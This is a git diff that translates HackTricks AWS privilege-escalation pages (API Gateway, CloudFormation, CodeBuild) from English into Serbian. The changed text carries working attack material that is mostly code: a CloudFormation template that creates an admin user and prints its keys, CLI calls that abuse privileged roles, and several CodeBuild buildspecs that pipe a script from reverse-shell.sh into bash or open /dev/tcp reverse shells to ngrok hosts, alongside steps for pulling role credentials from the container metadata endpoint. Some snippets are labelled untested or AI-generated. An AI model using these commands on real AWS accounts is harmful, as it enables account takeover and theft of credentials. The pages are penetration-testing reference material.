-An attacker with the permissions `apigateway:UpdateAuthorizer` and `apigateway:CreateDeployment` can **modify an existing API Gateway authorizer** to bypass security checks or to execute arbitrary code when API requests are made.
+> [!NAPOMENA]
+> Potrebno testiranje
 
+Napadač sa dozvolama `apigateway:UpdateAuthorizer` i `apigateway:CreateDeployment` može **modifikovati postojeći API Gateway autorizator** kako bi zaobišao bezbednosne provere ili izvršio proizvoljan kod kada se izvrše API zahtevi.
 ```bash
 API_ID="your-api-id"
 AUTHORIZER_ID="your-authorizer-id"
@@ -84,16 +75,14 @@ aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZ
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
-
-**Potential Impact**: Bypassing security checks, unauthorized access to API resources.
+**Potencijalni Uticaj**: Obilaženje bezbednosnih provera, neovlašćen pristup API resursima.
 
 ### `apigateway:UpdateVpcLink`
 
-> [!NOTE]
-> Need testing
-
-An attacker with the permission `apigateway:UpdateVpcLink` can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting private API traffic to unauthorized or malicious resources**.
+> [!NAPOMENA]
+> Potrebno testiranje
 
+Napadač sa dozvolom `apigateway:UpdateVpcLink` može **modifikovati postojeći VPC Link da usmeri na drugi Network Load Balancer, potencijalno preusmeravajući privatni API saobraćaj na neovlašćene ili zlonamerne resurse**.
 ```bash
 bashCopy codeVPC_LINK_ID="your-vpc-link-id"
 NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"
@@ -101,11 +90,6 @@ NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new
 # Update the VPC Link
 aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]"
 ```
-
-**Potential Impact**: Unauthorized access to private API resources, interception or disruption of API traffic.
+**Potencijalni uticaj**: Neovlašćen pristup privatnim API resursima, presretanje ili ometanje API saobraćaja.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md
index b477dc31f..f4e2282e8 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md
@@ -7,7 +7,3 @@
 TODO
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
index 39cba539e..0a40eb8aa 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
@@ -4,7 +4,7 @@
 
 ## cloudformation
 
-For more information about cloudformation check:
+Za više informacija o cloudformation pogledajte:
 
 {{#ref}}
 ../../aws-services/aws-cloudformation-and-codestar-enum.md
@@ -12,111 +12,99 @@ For more information about cloudformation check:
 
 ### `iam:PassRole`, `cloudformation:CreateStack`
 
-An attacker with these permissions **can escalate privileges** by crafting a **CloudFormation stack** with a custom template, hosted on their server, to **execute actions under the permissions of a specified role:**
-
+Napadač sa ovim dozvolama **može eskalirati privilegije** kreiranjem **CloudFormation steka** sa prilagođenim šablonom, hostovanim na njihovom serveru, da **izvrši akcije pod dozvolama određenog uloga:**
 ```bash
 aws cloudformation create-stack --stack-name  \
-    --template-url http://attacker.com/attackers.template \
-    --role-arn 
+--template-url http://attacker.com/attackers.template \
+--role-arn 
 ```
-
-In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`**:
+Na sledećoj stranici imate **primer eksploatacije** sa dodatnom dozvolom **`cloudformation:DescribeStacks`**:
 
 {{#ref}}
 iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
 {{#endref}}
 
-**Potential Impact:** Privesc to the cloudformation service role specified.
+**Potencijalni uticaj:** Privesc na servisnu ulogu cloudformation-a koja je navedena.
 
 ### `iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`)
 
-In this case you can a**buse an existing cloudformation stack** to update it and escalate privileges as in the previous scenario:
-
+U ovom slučaju možete **zloupotrebiti postojeći cloudformation stack** da ga ažurirate i eskalirate privilegije kao u prethodnom scenariju:
 ```bash
 aws cloudformation update-stack \
-    --stack-name privesc \
-    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
-    --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
-    --capabilities CAPABILITY_IAM \
-    --region eu-west-1
+--stack-name privesc \
+--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
+--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
+--capabilities CAPABILITY_IAM \
+--region eu-west-1
 ```
+The `cloudformation:SetStackPolicy` dozvola se može koristiti da **dajte sebi `UpdateStack` dozvolu** nad stekom i izvršite napad.
 
-The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack.
-
-**Potential Impact:** Privesc to the cloudformation service role specified.
+**Potencijalni uticaj:** Privesc na cloudformation servisnu ulogu koja je navedena.
 
 ### `cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`
 
-If you have this permission but **no `iam:PassRole`** you can still **update the stacks** used and abuse the **IAM Roles they have already attached**. Check the previous section for exploit example (just don't indicate any role in the update).
+Ako imate ovu dozvolu, ali **nemate `iam:PassRole`**, i dalje možete **ažurirati stekove** koji se koriste i zloupotrebiti **IAM uloge koje su već povezane**. Proverite prethodni odeljak za primer eksploatacije (samo nemojte navoditi nijednu ulogu u ažuriranju).
 
-The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack.
+The `cloudformation:SetStackPolicy` dozvola se može koristiti da **dajte sebi `UpdateStack` dozvolu** nad stekom i izvršite napad.
 
-**Potential Impact:** Privesc to the cloudformation service role already attached.
+**Potencijalni uticaj:** Privesc na cloudformation servisnu ulogu koja je već povezana.
 
 ### `iam:PassRole`,((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)
 
-An attacker with permissions to **pass a role and create & execute a ChangeSet** can **create/update a new cloudformation stack abuse the cloudformation service roles** just like with the CreateStack or UpdateStack.
-
-The following exploit is a **variation of the**[ **CreateStack one**](./#iam-passrole-cloudformation-createstack) using the **ChangeSet permissions** to create a stack.
+Napadač sa dozvolama da **prođe ulogu i kreira & izvrši ChangeSet** može **kreirati/ažurirati novi cloudformation stek i zloupotrebiti cloudformation servisne uloge** baš kao sa CreateStack ili UpdateStack.
 
+Sledeća eksploatacija je **varijacija**[ **CreateStack one**](./#iam-passrole-cloudformation-createstack) koristeći **ChangeSet dozvole** za kreiranje steka.
 ```bash
 aws cloudformation create-change-set \
-    --stack-name privesc \
-    --change-set-name privesc \
-    --change-set-type CREATE \
-    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
-    --role arn:aws:iam::947247140022:role/CloudFormationAdmin \
-    --capabilities CAPABILITY_IAM \
-    --region eu-west-1
+--stack-name privesc \
+--change-set-name privesc \
+--change-set-type CREATE \
+--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
+--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
+--capabilities CAPABILITY_IAM \
+--region eu-west-1
 
 echo "Waiting 2 mins to change the stack"
 sleep 120
 
 aws cloudformation execute-change-set \
-    --change-set-name privesc \
-    --stack-name privesc \
-    --region eu-west-1
+--change-set-name privesc \
+--stack-name privesc \
+--region eu-west-1
 
 echo "Waiting 2 mins to execute the stack"
 sleep 120
 
 aws cloudformation describe-stacks \
-    --stack-name privesc \
-    --region eu-west-1
+--stack-name privesc \
+--region eu-west-1
 ```
+Dozvola `cloudformation:SetStackPolicy` može se koristiti za **dodeljivanje sebi `ChangeSet` dozvola** nad stekom i izvršavanje napada.
 
-The `cloudformation:SetStackPolicy` permission can be used to **give yourself `ChangeSet` permissions** over a stack and perform the attack.
-
-**Potential Impact:** Privesc to cloudformation service roles.
+**Potencijalni uticaj:** Privesc na cloudformation servisne uloge.
 
 ### (`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)
 
-This is like the previous method without passing **IAM roles**, so you can just **abuse already attached ones**, just modify the parameter:
-
+Ovo je kao prethodna metoda bez prosleđivanja **IAM uloga**, tako da možete samo **zloupotrebiti već pridružene**, samo izmenite parametar:
 ```
 --change-set-type UPDATE
 ```
-
-**Potential Impact:** Privesc to the cloudformation service role already attached.
+**Potencijalni Uticaj:** Privesc na cloudformation servisnu ulogu koja je već povezana.
 
 ### `iam:PassRole`,(`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`)
 
-An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles.
+Napadač bi mogao da zloupotrebi ove dozvole da kreira/aktualizuje StackSets kako bi zloupotrebio proizvoljne cloudformation uloge.
 
-**Potential Impact:** Privesc to cloudformation service roles.
+**Potencijalni Uticaj:** Privesc na cloudformation servisne uloge.
 
 ### `cloudformation:UpdateStackSet`
 
-An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles.
+Napadač bi mogao da zloupotrebi ovu dozvolu bez passRole dozvole da ažurira StackSets kako bi zloupotrebio povezane cloudformation uloge.
 
-**Potential Impact:** Privesc to the attached cloudformation roles.
+**Potencijalni Uticaj:** Privesc na povezane cloudformation uloge.
 
-## References
+## Reference
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
index d41f9062c..a5e6063bc 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
@@ -2,84 +2,74 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like:
-
+Napadač bi mogao, na primer, da koristi **cloudformation šablon** koji generiše **ključeve za admin** korisnika kao:
 ```json
 {
-  "Resources": {
-    "AdminUser": {
-      "Type": "AWS::IAM::User"
-    },
-    "AdminPolicy": {
-      "Type": "AWS::IAM::ManagedPolicy",
-      "Properties": {
-        "Description": "This policy allows all actions on all resources.",
-        "PolicyDocument": {
-          "Version": "2012-10-17",
-          "Statement": [
-            {
-              "Effect": "Allow",
-              "Action": ["*"],
-              "Resource": "*"
-            }
-          ]
-        },
-        "Users": [
-          {
-            "Ref": "AdminUser"
-          }
-        ]
-      }
-    },
-    "MyUserKeys": {
-      "Type": "AWS::IAM::AccessKey",
-      "Properties": {
-        "UserName": {
-          "Ref": "AdminUser"
-        }
-      }
-    }
-  },
-  "Outputs": {
-    "AccessKey": {
-      "Value": {
-        "Ref": "MyUserKeys"
-      },
-      "Description": "Access Key ID of Admin User"
-    },
-    "SecretKey": {
-      "Value": {
-        "Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"]
-      },
-      "Description": "Secret Key of Admin User"
-    }
-  }
+"Resources": {
+"AdminUser": {
+"Type": "AWS::IAM::User"
+},
+"AdminPolicy": {
+"Type": "AWS::IAM::ManagedPolicy",
+"Properties": {
+"Description": "This policy allows all actions on all resources.",
+"PolicyDocument": {
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": ["*"],
+"Resource": "*"
+}
+]
+},
+"Users": [
+{
+"Ref": "AdminUser"
+}
+]
+}
+},
+"MyUserKeys": {
+"Type": "AWS::IAM::AccessKey",
+"Properties": {
+"UserName": {
+"Ref": "AdminUser"
+}
+}
+}
+},
+"Outputs": {
+"AccessKey": {
+"Value": {
+"Ref": "MyUserKeys"
+},
+"Description": "Access Key ID of Admin User"
+},
+"SecretKey": {
+"Value": {
+"Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"]
+},
+"Description": "Secret Key of Admin User"
+}
+}
 }
 ```
-
-Then **generate the cloudformation stack**:
-
+Zatim **generišite cloudformation stek**:
 ```bash
 aws cloudformation create-stack --stack-name privesc \
-    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
-    --role arn:aws:iam::[REDACTED]:role/adminaccess \
-    --capabilities CAPABILITY_IAM --region us-west-2
+--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
+--role arn:aws:iam::[REDACTED]:role/adminaccess \
+--capabilities CAPABILITY_IAM --region us-west-2
 ```
-
-**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**:
-
+**Sačekajte nekoliko minuta** da se stek generiše, a zatim **dobijte izlaz** iz steka gde su **akreditivi sačuvani**:
 ```bash
 aws cloudformation describe-stacks \
-    --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
-    --region uswest-2
+--stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
+--region uswest-2
 ```
-
 ### References
 
 - [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
index b179bec22..49fdd90c8 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
@@ -4,7 +4,7 @@
 
 ## codebuild
 
-Get more info in:
+Dobijte više informacija u:
 
 {{#ref}}
 ../aws-services/aws-codebuild-enum.md
@@ -12,70 +12,65 @@ Get more info in:
 
 ### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
 
-Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:
+Samo sa jednom od ovih dozvola dovoljno je pokrenuti gradnju sa novim buildspec-om i ukrasti token iam uloge dodeljene projektu:
 
 {{#tabs }}
 {{#tab name="StartBuild" }}
-
 ```bash
 cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml
 ```
-
 {{#endtab }}
 
 {{#tab name="StartBuildBatch" }}
-
 ```bash
 cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Note**: The difference between these two commands is that:
+**Napomena**: Razlika između ove dve komande je u tome što:
 
-- `StartBuild` triggers a single build job using a specific `buildspec.yml`.
-- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel).
+- `StartBuild` pokreće jedan posao izgradnje koristeći specifičan `buildspec.yml`.
+- `StartBuildBatch` vam omogućava da pokrenete grupu izgradnji, sa složenijim konfiguracijama (kao što je pokretanje više izgradnji paralelno).
 
-**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+**Potencijalni uticaj:** Direktno privesc na pridružene AWS Codebuild uloge.
 
 ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 
-An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one.
+Napadač sa **`iam:PassRole`, `codebuild:CreateProject`, i `codebuild:StartBuild` ili `codebuild:StartBuildBatch`** dozvolama bi mogao da **escalira privilegije na bilo koju codebuild IAM ulogu** kreiranjem aktivne. 
 
 {{#tabs }}
 {{#tab name="Example1" }}
-
 ```bash
 # Enumerate then env and get creds
 REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
@@ -84,20 +79,20 @@ REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATI
 REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
 
 JSON="{
-    \"name\": \"codebuild-demo-project\",
-    \"source\": {
-        \"type\": \"NO_SOURCE\",
-        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
-    },
-    \"artifacts\": {
-        \"type\": \"NO_ARTIFACTS\"
-    },
-    \"environment\": {
-        \"type\": \"LINUX_CONTAINER\",
-        \"image\": \"aws/codebuild/standard:1.0\",
-        \"computeType\": \"BUILD_GENERAL1_SMALL\"
-    },
-    \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
+\"name\": \"codebuild-demo-project\",
+\"source\": {
+\"type\": \"NO_SOURCE\",
+\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+},
+\"artifacts\": {
+\"type\": \"NO_ARTIFACTS\"
+},
+\"environment\": {
+\"type\": \"LINUX_CONTAINER\",
+\"image\": \"aws/codebuild/standard:1.0\",
+\"computeType\": \"BUILD_GENERAL1_SMALL\"
+},
+\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
 }"
 
 
@@ -117,19 +112,17 @@ aws codebuild start-build --project-name codebuild-demo-project
 # Delete the project
 aws codebuild delete-project --name codebuild-demo-project
 ```
-
 {{#endtab }}
 
 {{#tab name="Example2" }}
-
 ```bash
 # Generated by AI, not tested
 # Create a buildspec.yml file with reverse shell command
 echo 'version: 0.2
 phases:
-  build:
-    commands:
-      - curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml
+build:
+commands:
+- curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml
 
 # Upload the buildspec to the bucket and give access to everyone
 aws s3 cp buildspec.yml s3:/buildspec.yml
@@ -141,25 +134,23 @@ aws codebuild create-project --name reverse-shell-project --source type=S3,locat
 aws codebuild start-build --project-name reverse-shell-project
 
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Direct privesc to any AWS Codebuild role.
+**Potencijalni uticaj:** Direktno privesc na bilo koju AWS Codebuild ulogu.
 
 > [!WARNING]
-> In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**.
+> U **Codebuild kontejneru** datoteka `/codebuild/output/tmp/env.sh` sadrži sve env varijable potrebne za pristup **metapodacima akreditiva**.
 
-> This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`
+> Ova datoteka sadrži **env varijablu `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** koja sadrži **URL putanju** za pristup akreditivima. Biće nešto poput `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`
 
-> Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials.
+> Dodajte to URL-u **`http://169.254.170.2/`** i moći ćete da preuzmete akreditive uloge.
 
-> Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**.
+> Pored toga, takođe sadrži **env varijablu `ECS_CONTAINER_METADATA_URI`** koja sadrži kompletnu URL adresu za dobijanje **informacija o metapodacima kontejnera**.
 
 ### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 
-Just like in the previous section, if instead of creating a build project you can modify it, you can indicate the IAM Role and steal the token
-
+Baš kao u prethodnom odeljku, ako umesto kreiranja projekta za izgradnju možete da ga modifikujete, možete da navedete IAM ulogu i ukradete token.
 ```bash
 REV_PATH="/tmp/codebuild_pwn.json"
 
@@ -171,20 +162,20 @@ REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
 
 # You need to indicate the name of the project you want to modify
 JSON="{
-    \"name\": \"\",
-    \"source\": {
-        \"type\": \"NO_SOURCE\",
-        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
-    },
-    \"artifacts\": {
-        \"type\": \"NO_ARTIFACTS\"
-    },
-    \"environment\": {
-        \"type\": \"LINUX_CONTAINER\",
-        \"image\": \"aws/codebuild/standard:1.0\",
-        \"computeType\": \"BUILD_GENERAL1_SMALL\"
-    },
-    \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
+\"name\": \"\",
+\"source\": {
+\"type\": \"NO_SOURCE\",
+\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+},
+\"artifacts\": {
+\"type\": \"NO_ARTIFACTS\"
+},
+\"environment\": {
+\"type\": \"LINUX_CONTAINER\",
+\"image\": \"aws/codebuild/standard:1.0\",
+\"computeType\": \"BUILD_GENERAL1_SMALL\"
+},
+\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
 }"
 
 printf "$JSON" > $REV_PATH
@@ -193,16 +184,14 @@ aws codebuild update-project --cli-input-json file://$REV_PATH
 
 aws codebuild start-build --project-name codebuild-demo-project
 ```
-
-**Potential Impact:** Direct privesc to any AWS Codebuild role.
+**Potencijalni uticaj:** Direktno privesc na bilo koju AWS Codebuild ulogu.
 
 ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 
-Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**.
+Kao u prethodnom odeljku, ali **bez `iam:PassRole` dozvole**, možete zloupotrebiti ove dozvole da **modifikujete postojeće Codebuild projekte i pristupite ulozi koju već imaju dodeljenu**.
 
 {{#tabs }}
 {{#tab name="StartBuild" }}
-
 ```sh
 REV_PATH="/tmp/codebuild_pwn.json"
 
@@ -213,20 +202,20 @@ REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATI
 REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
 
 JSON="{
-    \"name\": \"\",
-    \"source\": {
-        \"type\": \"NO_SOURCE\",
-        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
-    },
-    \"artifacts\": {
-        \"type\": \"NO_ARTIFACTS\"
-    },
-    \"environment\": {
-        \"type\": \"LINUX_CONTAINER\",
-        \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
-        \"computeType\": \"BUILD_GENERAL1_SMALL\",
-        \"imagePullCredentialsType\": \"CODEBUILD\"
-    }
+\"name\": \"\",
+\"source\": {
+\"type\": \"NO_SOURCE\",
+\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+},
+\"artifacts\": {
+\"type\": \"NO_ARTIFACTS\"
+},
+\"environment\": {
+\"type\": \"LINUX_CONTAINER\",
+\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
+\"computeType\": \"BUILD_GENERAL1_SMALL\",
+\"imagePullCredentialsType\": \"CODEBUILD\"
+}
 }"
 
 # Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!
@@ -237,11 +226,9 @@ aws codebuild update-project --cli-input-json file://$REV_PATH
 
 aws codebuild start-build --project-name codebuild-demo-project
 ```
-
 {{#endtab }}
 
 {{#tab name="StartBuildBatch" }}
-
 ```sh
 REV_PATH="/tmp/codebuild_pwn.json"
 
@@ -250,20 +237,20 @@ REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
 
 # You need to indicate the name of the project you want to modify
 JSON="{
-    \"name\": \"project_name\",
-    \"source\": {
-        \"type\": \"NO_SOURCE\",
-        \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
-    },
-    \"artifacts\": {
-        \"type\": \"NO_ARTIFACTS\"
-    },
-    \"environment\": {
-        \"type\": \"LINUX_CONTAINER\",
-        \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
-        \"computeType\": \"BUILD_GENERAL1_SMALL\",
-        \"imagePullCredentialsType\": \"CODEBUILD\"
-    }
+\"name\": \"project_name\",
+\"source\": {
+\"type\": \"NO_SOURCE\",
+\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
+},
+\"artifacts\": {
+\"type\": \"NO_ARTIFACTS\"
+},
+\"environment\": {
+\"type\": \"LINUX_CONTAINER\",
+\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
+\"computeType\": \"BUILD_GENERAL1_SMALL\",
+\"imagePullCredentialsType\": \"CODEBUILD\"
+}
 }"
 
 printf "$JSON" > $REV_PATH
@@ -274,41 +261,37 @@ aws codebuild update-project --cli-input-json file://$REV_PATH
 
 aws codebuild start-build-batch --project-name codebuild-demo-project
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+**Potencijalni uticaj:** Direktno privesc do povezanih AWS Codebuild uloga.
 
 ### SSM
 
-Having **enough permissions to start a ssm session** it's possible to get **inside a Codebuild project** being built.
+Imati **dovoljno dozvola za pokretanje ssm sesije** omogućava pristup **unutar Codebuild projekta** koji se gradi.
 
-The codebuild project will need to have a breakpoint:
+Codebuild projekat će morati da ima tačku prekida:
 
 
phases:
-  pre_build:
-    commands:
-      - echo Entered the pre_build phase...
-      - echo "Hello World" > /tmp/hello-world
+pre_build:
+commands:
+- echo Ušao u pre_build fazu...
+- echo "Hello World" > /tmp/hello-world
       - codebuild-breakpoint
 

 
-And then:
-
+I zatim:
 ```bash
 aws codebuild batch-get-builds --ids  --region  --output json
 aws ssm start-session --target  --region 
 ```
-
-For more info [**check the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html).
+Za više informacija [**proverite dokumentaciju**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html).
 
 ### (`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject`
 
-An attacker able to start/restart a build of a specific CodeBuild project which stores its `buildspec.yml` file on an S3 bucket the attacker has write access to, can obtain command execution in the CodeBuild process.
-
-Note: the escalation is relevant only if the CodeBuild worker has a different role, hopefully more privileged, than the one of the attacker.
+Napadač koji može da pokrene/ponovo pokrene gradnju određenog CodeBuild projekta koji čuva svoj `buildspec.yml` fajl na S3 bucket-u kojem napadač ima pristup za pisanje, može dobiti izvršenje komandi u CodeBuild procesu.
 
+Napomena: eskalacija je relevantna samo ako CodeBuild radnik ima drugačiju ulogu, nadamo se privilegovaniju, od one napadača.
 ```bash
 aws s3 cp s3:///buildspec.yml ./
 
@@ -325,29 +308,22 @@ aws codebuild start-build --project-name 
 
 # Wait for the reverse shell :)
 ```
-
-You can use something like this **buildspec** to get a **reverse shell**:
-
+Možete koristiti nešto poput ovog **buildspec** da dobijete **reverse shell**:
 ```yaml:buildspec.yml
 version: 0.2
 
 phases:
-  build:
-    commands:
-      - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
+build:
+commands:
+- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
 ```
-
-**Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges.
+**Uticaj:** Direktno privesc na ulogu koju koristi AWS CodeBuild radnik koja obično ima visoke privilegije.
 
 > [!WARNING]
-> Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload
+> Imajte na umu da se buildspec može očekivati u zip formatu, tako da bi napadač morao da preuzme, raspakuje, izmeni `buildspec.yml` iz root direktorijuma, ponovo zipuje i otpremi
 
-More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/).
